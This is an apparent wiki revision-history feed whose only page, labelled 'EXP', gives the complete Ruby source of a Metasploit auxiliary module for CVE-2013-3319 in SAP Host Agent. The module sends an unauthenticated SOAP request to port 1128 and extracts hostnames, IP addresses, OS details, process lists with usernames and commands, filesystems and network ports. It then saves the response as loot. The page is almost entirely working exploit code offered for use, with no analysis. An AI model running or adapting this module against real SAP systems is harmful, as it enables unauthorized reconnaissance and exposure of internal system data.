https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2013-3319_SAP_Netweaver_7.03_%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E
CVE-2013-3319 SAP Netweaver 7.03 敏感信息泄漏漏洞 - Revision history
2026-04-14T14:45:04Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2013-3319_SAP_Netweaver_7.03_%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E&diff=1021&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> require 'msf/core' require 'rexml/document' class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report inclu..."
2021-04-06T02:50:44Z
<p>Created page with "==EXP== <pre> require 'msf/core' require 'rexml/document' class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report inclu..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
require 'msf/core'<br />
require 'rexml/document'<br />
<br />
class Metasploit4 < Msf::Auxiliary<br />
<br />
include Msf::Exploit::Remote::HttpClient<br />
include Msf::Auxiliary::Report<br />
include Msf::Auxiliary::Scanner<br />
<br />
def initialize<br />
super(<br />
'Name' => 'SAP Host Agent Information Disclosure',<br />
'Description' => %q{<br />
This module attempts to retrieve Computer and OS info from Host Agent<br />
through the SAP HostControl service<br />
},<br />
'References' =><br />
[<br />
# General<br />
[ 'CVE', '2013-3319'],<br />
[ 'URL', 'https://service.sap.com/sap/support/notes/1816536' ],<br />
[ 'URL', 'http://labs.integrity.pt/advisories/cve-2013-3319/']<br />
],<br />
'Author' =><br />
[<br />
'Bruno Morisson <bm[at]integrity.pt>'<br />
],<br />
'License' => MSF_LICENSE<br />
)<br />
<br />
register_options(<br />
[<br />
Opt::RPORT(1128)<br />
], self.class)<br />
<br />
register_autofilter_ports([ 1128 ])<br />
deregister_options('RHOST')<br />
deregister_options('VHOST')<br />
<br />
end<br />
<br />
def run_host(rhost)<br />
<br />
rport = datastore['RPORT']<br />
<br />
print_status("Connecting to SAP Host Control SOAP Interface on #{rhost}:#{rport}")<br />
<br />
success = false<br />
fault = false<br />
<br />
data = '<?xml version="1.0" encoding="utf-8"?>'<br />
data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"'<br />
data << 'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema">'<br />
data << '<SOAP-ENV:Header><sapsess:Session xlmns:sapsess="http://www.sap.com/webas/630/soap/features/session/">'<br />
data << '<enableSession>true</enableSession></sapsess:Session></SOAP-ENV:Header><SOAP-ENV:Body>'<br />
data << '<ns1:GetComputerSystem xmlns:ns1="urn:SAPHostControl"><aArguments><item>'<br />
data << '<mKey>provider</mKey><mValue>saposcol</mValue></item></aArguments></ns1:GetComputerSystem>'<br />
data << "</SOAP-ENV:Body></SOAP-ENV:Envelope>\r\n\r\n"<br />
<br />
begin<br />
<br />
res = send_request_raw({<br />
'uri' => "/#{datastore['URI']}",<br />
'method' => 'POST',<br />
'data' => data,<br />
'headers' =><br />
{<br />
'Content-Length' => data.length,<br />
'SOAPAction' => '""',<br />
'Content-Type' => 'text/xml; charset=UTF-8',<br />
}<br />
}, 15)<br />
<br />
if res and res.code == 200<br />
<br />
print_good("Got response from server, parsing...")<br />
<br />
env = []<br />
saptbl =[]<br />
totalitems=0<br />
<br />
saptbl[0] = Msf::Ui::Console::Table.new(<br />
Msf::Ui::Console::Table::Style::Default,<br />
'Header' => "Remote Computer Listing",<br />
'Prefix' => "\n",<br />
'Postfix' => "\n",<br />
'Indent' => 1,<br />
'Columns' =><br />
[<br />
"Names",<br />
"Hostnames",<br />
"IPAddresses"<br />
])<br />
<br />
saptbl[1] = Msf::Ui::Console::Table.new(<br />
Msf::Ui::Console::Table::Style::Default,<br />
'Header' => "Remote OS Listing",<br />
'Prefix' => "\n",<br />
'Postfix' => "\n",<br />
'Indent' => 1,<br />
'Columns' =><br />
[<br />
"Name",<br />
"Type",<br />
"Version",<br />
"TotalMemSize",<br />
"Load Avg 1m",<br />
"Load Avg 5m",<br />
"Load Avg 15m",<br />
"CPUs",<br />
"CPU User",<br />
"CPU Sys",<br />
"CPU Idle"<br />
])<br />
<br />
saptbl[2] = Msf::Ui::Console::Table.new(<br />
Msf::Ui::Console::Table::Style::Default,<br />
'Header' => "Remote Process Listing",<br />
'Prefix' => "\n",<br />
'Postfix' => "\n",<br />
'Indent' => 1,<br />
'Columns' =><br />
[ "Name",<br />
"PID",<br />
"Username",<br />
"Priority",<br />
"Size",<br />
"Pages",<br />
"CPU",<br />
"CPU Time",<br />
"Command"<br />
])<br />
<br />
saptbl[3] = Msf::Ui::Console::Table.new(<br />
Msf::Ui::Console::Table::Style::Default,<br />
'Header' => "Remote Filesystem Listing",<br />
'Prefix' => "\n",<br />
'Postfix' => "\n",<br />
'Indent' => 1,<br />
'Columns' =><br />
[ "Name",<br />
"Size",<br />
"Available",<br />
"Remote"<br />
])<br />
<br />
saptbl[4] = Msf::Ui::Console::Table.new(<br />
Msf::Ui::Console::Table::Style::Default,<br />
'Header' => "Network Port Listing",<br />
'Prefix' => "\n",<br />
'Postfix' => "\n",<br />
'Indent' => 1,<br />
'Columns' =><br />
[ "ID",<br />
"PacketsIn",<br />
"PacketsOut",<br />
"ErrorsIn",<br />
"ErrorsOut",<br />
"Collisions"<br />
])<br />
<br />
mxml = REXML::Document.new(res.body)<br />
<br />
itsamcs = mxml.elements.to_a("//mProperties/") # OS info<br />
<br />
itsam = mxml.elements.to_a("//item/mProperties/") # all other info<br />
<br />
<br />
itsamcs.each { |name|<br />
tbl =[]<br />
body = []<br />
body = "#{name}"<br />
env = body.scan(/<item><mName>(.+?)<\/mName><mType>(.+?)<\/mType><mValue>(.+?)<\/mValue><\/item>/ix)<br />
<br />
if env<br />
<br />
totalitems +=1<br />
<br />
case "#{env}"<br />
when /ITSAMComputerSystem/<br />
<br />
env.each do |m|<br />
tbl << "#{m[2]}" unless ("#{m}" =~ /ITSAM/)<br />
end<br />
<br />
saptbl[0] << [ tbl[0], tbl[1], tbl[2]]<br />
success = true # we have at least one response<br />
end<br />
<br />
end<br />
}<br />
<br />
<br />
itsam.each { |name|<br />
tbl =[]<br />
body = []<br />
# some items have no <mValue>, so we put a dummy with nil<br />
body = "#{name}".gsub(/\/mType><\/item/,"\/mType><mValue>(nil)<\/mValue><\/item")<br />
env = body.scan(/<item><mName>(.+?)<\/mName><mType>(.+?)<\/mType><mValue>(.+?)<\/mValue><\/item>/ix)<br />
<br />
if env<br />
<br />
totalitems +=1<br />
<br />
env.each do |m|<br />
tbl << "#{m[2]}" unless ("#{m}" =~ /ITSAM/)<br />
end<br />
<br />
case "#{env}"<br />
when /ITSAMOperatingSystem/<br />
saptbl[1] << [ tbl[0], tbl[1], tbl[2], tbl[8], tbl[11],tbl[12],tbl[13],tbl[17],tbl[18]+'%',tbl[19]+'%',tbl[20]+'%']<br />
success = true # we have at least one response<br />
<br />
when /ITSAMOSProcess/<br />
saptbl[2] << [ tbl[0], tbl[1], tbl[2], tbl[3], tbl[4],tbl[5],tbl[6]+'%',tbl[7],tbl[8] ]<br />
success = true # we have at least one response<br />
<br />
when /ITSAMFileSystem/<br />
saptbl[3] << [ tbl[0], tbl[2], tbl[3], tbl[4] ]<br />
success = true # we have at least one response<br />
<br />
when /ITSAMNetworkPort/<br />
saptbl[4] << [ tbl[0], tbl[1], tbl[2], tbl[3], tbl[4], tbl[5] ]<br />
success = true # we have at least one response<br />
end<br />
<br />
end<br />
}<br />
<br />
elsif res and res.code == 500<br />
case res.body<br />
when /<faultstring>(.*)<\/faultstring>/i<br />
faultcode = $1.strip<br />
fault = true<br />
end<br />
end<br />
<br />
rescue ::Rex::ConnectionError<br />
print_error("Unable to connect to #{rhost}:#{rport}")<br />
return<br />
end<br />
<br />
if success<br />
print_good("#{totalitems} items listed")<br />
<br />
saptbl.each do |t|<br />
print(t.to_s)<br />
end<br />
<br />
p = store_loot(<br />
"sap.getcomputersystem",<br />
"text/xml",<br />
rhost,<br />
res.body,<br />
"sap_getcomputersystem.xml",<br />
"SAP GetComputerSystem XML"<br />
)<br />
print_status("Response stored in: #{p}")<br />
<br />
return<br />
elsif fault<br />
print_error("#{rhost}:#{rport} - Error code: #{faultcode}")<br />
return<br />
else<br />
print_error("#{rhost}:#{rport} - Failed to parse list")<br />
return<br />
end<br />
return<br />
end<br />
end<br />
<br />
</pre></div>
Pwnwiki